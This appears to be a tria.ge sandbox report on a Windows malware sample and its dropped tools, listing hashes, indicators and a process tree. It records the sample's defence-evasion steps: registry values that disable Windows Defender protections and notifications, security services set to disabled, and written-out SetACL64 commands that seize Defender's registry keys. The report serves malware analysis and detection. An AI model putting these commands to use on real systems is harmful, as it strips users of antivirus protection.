Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
73f58da2e16...3f.exe
windows7-x64
103f58da2e16...3f.exe
windows10-2004-x64
10$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_32_/PowerRun64.exe
windows7-x64
4$_32_/PowerRun64.exe
windows10-2004-x64
3$_32_/SetACL64.exe
windows7-x64
1$_32_/SetACL64.exe
windows10-2004-x64
1$_32_/cabw...ws.exe
windows7-x64
1$_32_/cabw...ws.exe
windows10-2004-x64
1$_32_/p64.bat
windows7-x64
10$_32_/p64.bat
windows10-2004-x64
10$_32_/win_...rp.exe
windows7-x64
1$_32_/win_...rp.exe
windows10-2004-x64
1Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
12/07/2024, 07:47
Behavioral task
behavioral1
Sample
3f58da2e1652dddab53995166f24993f.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
3f58da2e1652dddab53995166f24993f.exe
Resource
win10v2004-20240704-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240704-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20240709-en
Behavioral task
behavioral7
Sample
$_32_/PowerRun64.exe
Resource
win7-20240705-en
Behavioral task
behavioral8
Sample
$_32_/PowerRun64.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral9
Sample
$_32_/SetACL64.exe
Resource
win7-20240704-en
Behavioral task
behavioral10
Sample
$_32_/SetACL64.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral11
Sample
$_32_/cabweejcuqvpws.exe
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
$_32_/cabweejcuqvpws.exe
Resource
win10v2004-20240709-en
Behavioral task
behavioral13
Sample
$_32_/p64.bat
Resource
win7-20240704-en
Behavioral task
behavioral14
Sample
$_32_/p64.bat
Resource
win10v2004-20240709-en
Behavioral task
behavioral15
Sample
$_32_/win_version_csharp.exe
Resource
win7-20240705-en
Behavioral task
behavioral16
Sample
$_32_/win_version_csharp.exe
Resource
win10v2004-20240709-en
General
-
Target
3f58da2e1652dddab53995166f24993f.exe
-
Size
877KB
-
MD5
3f58da2e1652dddab53995166f24993f
-
SHA1
1721c19909c2309398d5174f9fcb2abcff51e862
-
SHA256
d14ee261ed6c5dddc1900587c455991defe0f49c1da1172d7f8f1e163309d3e8
-
SHA512
ece1950851e0724f465471cfd50021f0c13642f66753c56bb77c91e6db972032ce272286f2d51f5c87edb61b806cd8a21458286f8bd1b799821526966b10dca1
-
SSDEEP
24576:MGxOacf/CoFPz8s43+ae4Y9hJ9HFtMr6lLwLkM0VP90ef2:XxyCoZz943+YaJNFtM+5wL3AP912
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRoutinelyTakingAction = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScriptScanning = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableEnhancedNotifications = "1" reg.exe -
Modifies security service 2 TTPs 4 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Executes dropped EXE 57 IoCs
pid Process 2888 SetACL64.exe 3872 SetACL64.exe 4508 SetACL64.exe 3232 SetACL64.exe 3096 SetACL64.exe 1176 SetACL64.exe 116 SetACL64.exe 2600 SetACL64.exe 4008 PowerRun64.exe 4016 PowerRun64.exe 2224 PowerRun64.exe 844 PowerRun64.exe 3320 PowerRun64.exe 4336 PowerRun64.exe 3332 PowerRun64.exe 4908 PowerRun64.exe 4052 PowerRun64.exe 1760 PowerRun64.exe 4948 PowerRun64.exe 4912 PowerRun64.exe 636 PowerRun64.exe 1684 PowerRun64.exe 3312 PowerRun64.exe 2200 PowerRun64.exe 1504 PowerRun64.exe 1128 PowerRun64.exe 3052 PowerRun64.exe 2932 PowerRun64.exe 4384 PowerRun64.exe 4320 PowerRun64.exe 2996 PowerRun64.exe 5016 PowerRun64.exe 820 PowerRun64.exe 212 PowerRun64.exe 1652 PowerRun64.exe 2868 PowerRun64.exe 3684 PowerRun64.exe 3752 PowerRun64.exe 3504 PowerRun64.exe 1476 PowerRun64.exe 2624 PowerRun64.exe 2796 PowerRun64.exe 3476 PowerRun64.exe 2596 PowerRun64.exe 4712 PowerRun64.exe 4012 PowerRun64.exe 3788 PowerRun64.exe 4088 PowerRun64.exe 4940 PowerRun64.exe 2996 PowerRun64.exe 2016 PowerRun64.exe 4044 PowerRun64.exe 116 PowerRun64.exe 3684 PowerRun64.exe 2616 PowerRun64.exe 4232 PowerRun64.exe 760 win_version_csharp.exe -
Loads dropped DLL 2 IoCs
pid Process 3284 3f58da2e1652dddab53995166f24993f.exe 3284 3f58da2e1652dddab53995166f24993f.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features SetACL64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features SetACL64.exe -
pid Process 4028 powershell.exe 1464 powershell.exe 1948 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" PowerRun64.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" PowerRun64.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" PowerRun64.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4008 PowerRun64.exe 4008 PowerRun64.exe 4008 PowerRun64.exe 4008 PowerRun64.exe 2224 PowerRun64.exe 2224 PowerRun64.exe 2224 PowerRun64.exe 2224 PowerRun64.exe 4016 PowerRun64.exe 4016 PowerRun64.exe 4016 PowerRun64.exe 4016 PowerRun64.exe 3320 PowerRun64.exe 3320 PowerRun64.exe 3320 PowerRun64.exe 3320 PowerRun64.exe 3332 PowerRun64.exe 3332 PowerRun64.exe 3332 PowerRun64.exe 3332 PowerRun64.exe 4908 PowerRun64.exe 4908 PowerRun64.exe 4908 PowerRun64.exe 4908 PowerRun64.exe 1760 PowerRun64.exe 1760 PowerRun64.exe 1760 PowerRun64.exe 1760 PowerRun64.exe 4948 PowerRun64.exe 4948 PowerRun64.exe 4948 PowerRun64.exe 4948 PowerRun64.exe 636 PowerRun64.exe 636 PowerRun64.exe 636 PowerRun64.exe 636 PowerRun64.exe 1684 PowerRun64.exe 1684 PowerRun64.exe 1684 PowerRun64.exe 1684 PowerRun64.exe 2200 PowerRun64.exe 2200 PowerRun64.exe 2200 PowerRun64.exe 2200 PowerRun64.exe 1504 PowerRun64.exe 1504 PowerRun64.exe 1504 PowerRun64.exe 1504 PowerRun64.exe 3052 PowerRun64.exe 3052 PowerRun64.exe 2932 PowerRun64.exe 2932 PowerRun64.exe 3052 PowerRun64.exe 3052 PowerRun64.exe 2932 PowerRun64.exe 2932 PowerRun64.exe 4320 PowerRun64.exe 4320 PowerRun64.exe 4320 PowerRun64.exe 4320 PowerRun64.exe 2996 PowerRun64.exe 2996 PowerRun64.exe 2996 PowerRun64.exe 2996 PowerRun64.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeBackupPrivilege 2888 SetACL64.exe Token: SeRestorePrivilege 2888 SetACL64.exe Token: SeTakeOwnershipPrivilege 2888 SetACL64.exe Token: SeBackupPrivilege 3872 SetACL64.exe Token: SeRestorePrivilege 3872 SetACL64.exe Token: SeTakeOwnershipPrivilege 3872 SetACL64.exe Token: SeBackupPrivilege 4508 SetACL64.exe Token: SeRestorePrivilege 4508 SetACL64.exe Token: SeTakeOwnershipPrivilege 4508 SetACL64.exe Token: SeBackupPrivilege 3232 SetACL64.exe Token: SeRestorePrivilege 3232 SetACL64.exe Token: SeTakeOwnershipPrivilege 3232 SetACL64.exe Token: SeBackupPrivilege 3096 SetACL64.exe Token: SeRestorePrivilege 3096 SetACL64.exe Token: SeTakeOwnershipPrivilege 3096 SetACL64.exe Token: SeBackupPrivilege 1176 SetACL64.exe Token: SeRestorePrivilege 1176 SetACL64.exe Token: SeTakeOwnershipPrivilege 1176 SetACL64.exe Token: SeBackupPrivilege 116 SetACL64.exe Token: SeRestorePrivilege 116 SetACL64.exe Token: SeTakeOwnershipPrivilege 116 SetACL64.exe Token: SeBackupPrivilege 2600 SetACL64.exe Token: SeRestorePrivilege 2600 SetACL64.exe Token: SeTakeOwnershipPrivilege 2600 SetACL64.exe Token: SeDebugPrivilege 4008 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 4008 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 4008 PowerRun64.exe Token: 0 4008 PowerRun64.exe Token: SeDebugPrivilege 2224 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 2224 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 2224 PowerRun64.exe Token: 0 2224 PowerRun64.exe Token: SeDebugPrivilege 4016 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 4016 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 4016 PowerRun64.exe Token: SeDebugPrivilege 844 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 844 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 844 PowerRun64.exe Token: SeDebugPrivilege 3320 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 3320 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 3320 PowerRun64.exe Token: 0 3320 PowerRun64.exe Token: SeDebugPrivilege 3332 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 3332 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 3332 PowerRun64.exe Token: SeDebugPrivilege 4908 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 4908 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 4908 PowerRun64.exe Token: 0 4908 PowerRun64.exe Token: SeDebugPrivilege 1760 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1760 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1760 PowerRun64.exe Token: SeDebugPrivilege 4948 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 4948 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 4948 PowerRun64.exe Token: 0 4948 PowerRun64.exe Token: SeDebugPrivilege 636 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 636 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 636 PowerRun64.exe Token: SeDebugPrivilege 1684 PowerRun64.exe Token: SeAssignPrimaryTokenPrivilege 1684 PowerRun64.exe Token: SeIncreaseQuotaPrivilege 1684 PowerRun64.exe Token: 0 1684 PowerRun64.exe Token: SeDebugPrivilege 2200 PowerRun64.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3284 wrote to memory of 4868 3284 3f58da2e1652dddab53995166f24993f.exe 83 PID 3284 wrote to memory of 4868 3284 3f58da2e1652dddab53995166f24993f.exe 83 PID 3284 wrote to memory of 4868 3284 3f58da2e1652dddab53995166f24993f.exe 83 PID 4868 wrote to memory of 2888 4868 cmd.exe 85 PID 4868 wrote to memory of 2888 4868 cmd.exe 85 PID 4868 wrote to memory of 3872 4868 cmd.exe 86 PID 4868 wrote to memory of 3872 4868 cmd.exe 86 PID 4868 wrote to memory of 4508 4868 cmd.exe 87 PID 4868 wrote to memory of 4508 4868 cmd.exe 87 PID 4868 wrote to memory of 3232 4868 cmd.exe 89 PID 4868 wrote to memory of 3232 4868 cmd.exe 89 PID 4868 wrote to memory of 3096 4868 cmd.exe 90 PID 4868 wrote to memory of 3096 4868 cmd.exe 90 PID 4868 wrote to memory of 1176 4868 cmd.exe 92 PID 4868 wrote to memory of 1176 4868 cmd.exe 92 PID 4868 wrote to memory of 116 4868 cmd.exe 93 PID 4868 wrote to memory of 116 4868 cmd.exe 93 PID 4868 wrote to memory of 2600 4868 cmd.exe 94 PID 4868 wrote to memory of 2600 4868 cmd.exe 94 PID 4868 wrote to memory of 1532 4868 cmd.exe 95 PID 4868 wrote to memory of 1532 4868 cmd.exe 95 PID 4868 wrote to memory of 1532 4868 cmd.exe 95 PID 4868 wrote to memory of 2744 4868 cmd.exe 96 PID 4868 wrote to memory of 2744 4868 cmd.exe 96 PID 4868 wrote to memory of 2744 4868 cmd.exe 96 PID 4868 wrote to memory of 4872 4868 cmd.exe 98 PID 4868 wrote to memory of 4872 4868 cmd.exe 98 PID 4868 wrote to memory of 4872 4868 cmd.exe 98 PID 4868 wrote to memory of 4572 4868 cmd.exe 99 PID 4868 wrote to memory of 4572 4868 cmd.exe 99 PID 4868 wrote to memory of 4572 4868 cmd.exe 99 PID 4868 wrote to memory of 1948 4868 cmd.exe 100 PID 4868 wrote to memory of 1948 4868 cmd.exe 100 PID 4868 wrote to memory of 1948 4868 cmd.exe 100 PID 4868 wrote to memory of 2764 4868 cmd.exe 101 PID 4868 wrote to memory of 2764 4868 cmd.exe 101 PID 4868 wrote to memory of 2764 4868 cmd.exe 101 PID 4868 wrote to memory of 5048 4868 cmd.exe 102 PID 4868 wrote to memory of 5048 4868 cmd.exe 102 PID 4868 wrote to memory of 5048 4868 cmd.exe 102 PID 4868 wrote to memory of 1428 4868 cmd.exe 103 PID 4868 wrote to memory of 1428 4868 cmd.exe 103 PID 4868 wrote to memory of 1428 4868 cmd.exe 103 PID 4868 wrote to memory of 3428 4868 cmd.exe 104 PID 4868 wrote to memory of 3428 4868 cmd.exe 104 PID 4868 wrote to memory of 3428 4868 cmd.exe 104 PID 4868 wrote to memory of 1540 4868 cmd.exe 105 PID 4868 wrote to memory of 1540 4868 cmd.exe 105 PID 4868 wrote to memory of 1540 4868 cmd.exe 105 PID 4868 wrote to memory of 5036 4868 cmd.exe 106 PID 4868 wrote to memory of 5036 4868 cmd.exe 106 PID 4868 wrote to memory of 5036 4868 cmd.exe 106 PID 4868 wrote to memory of 3708 4868 cmd.exe 107 PID 4868 wrote to memory of 3708 4868 cmd.exe 107 PID 4868 wrote to memory of 3708 4868 cmd.exe 107 PID 4868 wrote to memory of 4800 4868 cmd.exe 108 PID 4868 wrote to memory of 4800 4868 cmd.exe 108 PID 4868 wrote to memory of 4800 4868 cmd.exe 108 PID 4868 wrote to memory of 4044 4868 cmd.exe 109 PID 4868 wrote to memory of 4044 4868 cmd.exe 109 PID 4868 wrote to memory of 4044 4868 cmd.exe 109 PID 4868 wrote to memory of 4048 4868 cmd.exe 110 PID 4868 wrote to memory of 4048 4868 cmd.exe 110 PID 4868 wrote to memory of 4048 4868 cmd.exe 110
Processes
-
C:\Users\Admin\AppData\Local\Temp\3f58da2e1652dddab53995166f24993f.exe"C:\Users\Admin\AppData\Local\Temp\3f58da2e1652dddab53995166f24993f.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3284 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\p64.bat2⤵
- Suspicious use of WriteProcessMemory
PID:4868 -
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3872
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:4508
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Windows security modification
- Suspicious use of AdjustPrivilegeToken
PID:3232
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3096
-
-
C:\Users\Admin\AppData\Local\Temp\nsa9461.tmp\SetACL64.exeSetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1176
-
-
